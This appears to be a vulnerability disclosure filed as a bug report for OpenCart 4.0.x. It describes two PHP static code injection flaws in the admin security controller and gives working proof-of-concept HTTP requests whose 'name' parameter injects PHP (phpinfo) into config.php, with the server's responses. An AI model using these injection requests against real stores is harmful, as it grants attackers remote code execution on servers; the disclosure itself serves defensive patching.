What version of OpenCart are you reporting this for?
OpenCart versions 4.0.0.0 to 4.0.2.3

Describe the bug
There are two distinct static code injection vulnerabilities in the function that moves the storage folder outside the application web root, and the function that renames the secret admin path after the installation. While the latter can be exploited only if the admin folder has not yet been renamed, the former can be exploited anytime, even if the storage folder has already been moved. Both vulnerabilities require that the user has the common/security “access” and “modify” privileges enabled. Exploiting them, an authenticated adversary can inject arbitrary static PHP code that will be executed by every page, resulting in arbitrary remote code execution. Those vulnerabilities were both introduced from OpenCart 4.0.0.0 onward.

The storage() function in upload/admin/controller/common/security.php is vulnerable to PHP static code injection because $name and $path user-controlled variables are concatenated and placed inside $base_new, which is then written inside the config.php and admin/config.php files, without proper escape or validation.

The admin() function in upload/admin/controller/common/security.php is vulnerable to PHP static code injection because $name user-controlled variable is placed inside $base_new, which is then written inside a new config.php file, without proper escape or validation.

To Reproduce
Refer to the following article: https://0xbro.red/disclosures/disclosed-vulnerabilities/opencart-cve-2023-47444/#vulnerabilities-details-and-root-causes

PoC for common/security.storage:
Request 1:

GET /admin_secret/index.php?route=common/security.storage&name=pwned');phpinfo();%23&path=/home/kali/Projects/OpenCart/4.0.2.3/&user_token=e5e8e0f6369ef124dd3d94d4d4e1d8ad HTTP/1.1
Host: 127.0.0.1:8888
Cookie: OCSESSID=fbc47c7e5098550f0c12070be0

--- RESPONSE ---

HTTP/1.1 200 OK

{"next":"http:\/\/127.0.0.1:8888\/admin_secret\/index.php?route=common\/security.storage&user_token=e5e8e0f6369ef124dd3d94d4d4e1d8ad&name=pwned');phpinfo();#&path=\/home\/kali\/Projects\/OpenCart\/4.0.2.3\/&page=2"}

Request 2:

GET /admin_secret/index.php?route=common/security.storage&name=pwned');phpinfo();%23&path=/home/kali/Projects/OpenCart/4.0.2.3/&user_token=e5e8e0f6369ef124dd3d94d4d4e1d8ad&page=99 HTTP/1.1
Host: 127.0.0.1:8888
Cookie: OCSESSID=fbc47c7e5098550f0c12070be0

--- RESPONSE ---

HTTP/1.1 200 OK

{"success":"Success: Storage directory has been moved!"}

PoC for common/security.admin:
Request 1:

GET /admin/index.php?route=common/security.admin&user_token=7cc69dfa3112eb181c75da78147d8af1&page=1&name=foo%27);phpinfo();print(%27 HTTP/1.1
Host: 127.0.0.1:8888
Cookie: OCSESSID=fbc47c7e5098550f0c12070be0

--- RESPONSE ---

HTTP/1.1 200 OK

{"next":"http:\/\/127.0.0.1:8888\/admin\/index.php?route=common\/security.admin&user_token=7cc69dfa3112eb181c75da78147d8af1&name=foo');phpinfo();print('&page=2"}

Request 2:

GET /admin/index.php?route=common/security.admin&user_token=7cc69dfa3112eb181c75da78147d8af1&page=99&name=foo%27);phpinfo();print(%27 HTTP/1.1
Host: 127.0.0.1:8888
Cookie: OCSESSID=fbc47c7e5098550f0c12070be0

--- RESPONSE ---

HTTP/1.1 200 OK

{"redirect":"http:\/\/127.0.0.1:8888\/foo');phpinfo();print('\/index.php?route=common\/login"}

Expected behavior
User input should be sanitized, removing undesired dangerous characters.

Screenshots / Screen recordings
https://youtu.be/auTky_gm8Rk
https://youtu.be/6if6Kfsb2oM